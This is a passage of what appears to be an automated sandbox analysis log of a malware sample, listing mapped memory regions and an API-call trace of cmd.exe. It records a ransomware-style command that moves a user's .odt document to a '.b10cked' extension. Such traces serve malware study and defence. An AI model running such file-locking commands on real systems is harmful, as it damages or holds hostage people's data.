0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16149 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16150 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16151 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16152 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16153 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16154 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16155 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16156 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 16157 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16158 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16159 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16160 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16161 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16162 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16163 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 16164 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 16165 start_va = 0x12b0000 end_va = 0x1412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Thread: id = 222 os_tid = 0xdf8 [0141.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fa9c | out: lpSystemTimeAsFileTime=0x22fa9c*(dwLowDateTime=0x8e7e4e80, dwHighDateTime=0x1d440a9)) [0141.866] GetCurrentProcessId () returned 0xe54 [0141.866] GetCurrentThreadId () returned 0xdf8 [0141.866] GetTickCount () returned 0x2c715 [0141.866] QueryPerformanceCounter (in: lpPerformanceCount=0x22fa94 | out: lpPerformanceCount=0x22fa94*=19865521708) returned 1 [0141.867] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.867] __set_app_type (_Type=0x1) [0141.867] __p__fmode () returned 0x76b331f4 [0141.867] __p__commode () returned 0x76b331fc [0141.867] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.867] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.867] GetCurrentThreadId () returned 0xdf8 [0141.867] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdf8) returned 0x38 [0141.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.868] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.868] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa2c | out: phkResult=0x22fa2c*=0x0) returned 0x2 [0141.868] VirtualQuery (in: lpAddress=0x22fa63, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.868] GetConsoleOutputCP () returned 0x1b5 [0141.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.868] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.869] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.869] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.871] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.871] GetEnvironmentStringsW () returned 0x3f0228* [0141.871] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.871] GetEnvironmentStringsW () returned 0x3f0228* [0141.872] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e99c | out: phkResult=0x22e99c*=0x40) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0xb8, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x0, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegCloseKey (hKey=0x40) returned 0x0 [0141.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e99c | out: phkResult=0x22e99c*=0x40) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x0, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.873] RegCloseKey (hKey=0x40) returned 0x0 [0141.873] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.873] srand (_Seed=0x5b886370) [0141.873] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" [0141.873] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" [0141.873] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.873] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1988, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.873] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.873] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.874] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.874] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.874] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.874] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.874] GetEnvironmentStringsW () returned 0x3f2378* [0141.874] FreeEnvironmentStringsW (penv=0x3f2378) returned 1 [0141.874] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.874] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.874] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.874] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.874] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.874] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.874] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.875] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f768, lpFilePart=0x22f764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f764*="Desktop") returned 0x18 [0141.875] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.875] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.875] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.875] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.876] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.876] GetEnvironmentStringsW () returned 0x3f0228* [0141.876] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.877] GetConsoleOutputCP () returned 0x1b5 [0141.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.877] GetUserDefaultLCID () returned 0x409 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="0") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="0") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="1") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.878] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.879] GetConsoleTitleW (in: lpConsoleTitle=0x3e0940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.880] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.880] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.880] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.880] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.880] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.880] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.880] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.885] GetConsoleTitleW (in: lpConsoleTitle=0x22f5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.314] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.314] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.314] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.314] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.314] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.314] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.314] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.314] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.314] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.314] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.314] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.315] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.315] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0142.315] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0142.315] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.315] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.315] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.315] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.315] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.315] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.316] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f35c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f354, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f354*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.317] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0142.318] _wcsicmp (_String1="VAFVM9~1.ODT", _String2=".") returned 72 [0142.318] _wcsicmp (_String1="VAFVM9~1.ODT", _String2="..") returned 72 [0142.318] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9~1.odt")) returned 0x20 [0142.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f1f78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.612] SetErrorMode (uMode=0x0) returned 0x0 [0142.612] SetErrorMode (uMode=0x1) returned 0x0 [0142.612] GetFullPathNameW (in: 